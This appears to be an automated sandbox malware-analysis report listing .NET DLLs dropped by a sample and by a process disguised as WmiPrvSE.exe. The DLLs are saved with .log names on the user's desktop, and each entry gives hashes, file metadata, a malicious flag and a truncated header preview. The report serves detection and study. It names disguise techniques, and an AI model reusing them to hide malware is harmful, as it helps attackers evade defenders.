File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38912
Entropy (8bit):	5.679286635687991
Encrypted:	false
SSDEEP:	768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
MD5:	9E910782CA3E88B3F87826609A21A54E
SHA1:	8DBC333244620EDA5D3F1C9EAA6B924455262303
SHA-256:	3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
SHA-512:	592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\kOAKeIBA.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\kWkcJscF.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	6.057993947082715
Encrypted:	false
SSDEEP:	3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
MD5:	16B480082780CC1D8C23FB05468F64E7
SHA1:	6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
SHA-256:	7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
SHA-512:	A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

C:\Users\user\Desktop\kcQjpOfp.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	5.636032516496583
Encrypted:	false
SSDEEP:	384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
MD5:	996BD447A16F0A20F238A611484AFE86
SHA1:	CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
SHA-256:	0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
SHA-512:	80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\kjAKCvZY.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.660491370279985
Encrypted:	false
SSDEEP:	768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
MD5:	240E98D38E0B679F055470167D247022
SHA1:	49888CCED719AE78EE3BAE2959402749668AA1C6
SHA-256:	C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
SHA-512:	93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-\|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\lHCBdANz.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	342528
Entropy (8bit):	6.170134230759619
Encrypted:	false
SSDEEP:	3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
MD5:	9DADB5C8A6FD5020275C31EE6BC61D63
SHA1:	ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
SHA-256:	80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
SHA-512:	EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\lZsrLOuk.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\lkUrzNzM.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\mRnsAsGv.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	5.636032516496583
Encrypted:	false
SSDEEP:	384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
MD5:	996BD447A16F0A20F238A611484AFE86
SHA1:	CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
SHA-256:	0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
SHA-512:	80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\mUfaJIkR.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	5.870612048031897
Encrypted:	false
SSDEEP:	768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
MD5:	3601048DFB8C4A69313A593E74E5A2DE
SHA1:	A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
SHA-256:	F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
SHA-512:	B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\nSHawKfi.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34304
Entropy (8bit):	5.618776214605176
Encrypted:	false
SSDEEP:	768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
MD5:	9B25959D6CD6097C0EF36D2496876249
SHA1:	535B4D0576746D88537D4E9B01353210D893F4D2
SHA-256:	4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
SHA-512:	C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t\|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\niPqzeHY.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34304
Entropy (8bit):	5.618776214605176
Encrypted:	false
SSDEEP:	768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
MD5:	9B25959D6CD6097C0EF36D2496876249
SHA1:	535B4D0576746D88537D4E9B01353210D893F4D2
SHA-256:	4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
SHA-512:	C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t\|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\nzWIOABa.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	6.010605469502259
Encrypted:	false
SSDEEP:	6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
MD5:	00574FB20124EAFD40DC945EC86CA59C
SHA1:	8B96C4B6F450E711085AE7B22517C195222ACFDF
SHA-256:	3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
SHA-512:	B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\Desktop\oOOAVsVq.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\oTbQbbYz.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	50176
Entropy (8bit):	5.723168999026349
Encrypted:	false
SSDEEP:	768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
MD5:	2E116FC64103D0F0CF47890FD571561E
SHA1:	3EF08A9B057D1876C24FC76E937CDA461FAC6071
SHA-256:	25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
SHA-512:	39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ocsSTCYe.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	50176
Entropy (8bit):	5.723168999026349
Encrypted:	false
SSDEEP:	768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
MD5:	2E116FC64103D0F0CF47890FD571561E
SHA1:	3EF08A9B057D1876C24FC76E937CDA461FAC6071
SHA-256:	25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
SHA-512:	39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\pdjZooeB.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\qKWRQFlK.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38912
Entropy (8bit):	5.679286635687991
Encrypted:	false
SSDEEP:	768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
MD5:	9E910782CA3E88B3F87826609A21A54E
SHA1:	8DBC333244620EDA5D3F1C9EAA6B924455262303
SHA-256:	3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
SHA-512:	592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\qQwaFPUc.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	6.057993947082715
Encrypted:	false
SSDEEP:	3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
MD5:	16B480082780CC1D8C23FB05468F64E7
SHA1:	6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
SHA-256:	7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
SHA-512:	A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

C:\Users\user\Desktop\qpMzVwBT.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	342528
Entropy (8bit):	6.170134230759619
Encrypted:	false
SSDEEP:	3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
MD5:	9DADB5C8A6FD5020275C31EE6BC61D63
SHA1:	ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
SHA-256:	80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
SHA-512:	EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\quKhiaRV.log

Download File

Process:	C:\Users\user\Desktop\9D7RwuJrth.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	5.870612048031897
Encrypted:	false
SSDEEP:	768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
MD5:	3601048DFB8C4A69313A593E74E5A2DE
SHA1:	A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
SHA-256:	F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
SHA-512:	B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\rAfaFgSo.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	6.010605469502259
Encrypted:	false
SSDEEP:	6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
MD5:	00574FB20124EAFD40DC945EC86CA59C
SHA1:	8B96C4B6F450E711085AE7B22517C195222ACFDF
SHA-256:	3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
SHA-512:	B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\Desktop\rEFrcoVj.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.660491370279985
Encrypted:	false
SSDEEP:	768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
MD5:	240E98D38E0B679F055470167D247022
SHA1:	49888CCED719AE78EE3BAE2959402749668AA1C6
SHA-256:	C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
SHA-512:	93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-\|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\rMoKHXwo.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34304
Entropy (8bit):	5.618776214605176
Encrypted:	false
SSDEEP:	768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
MD5:	9B25959D6CD6097C0EF36D2496876249
SHA1:	535B4D0576746D88537D4E9B01353210D893F4D2
SHA-256:	4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
SHA-512:	C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
Malicious:	true
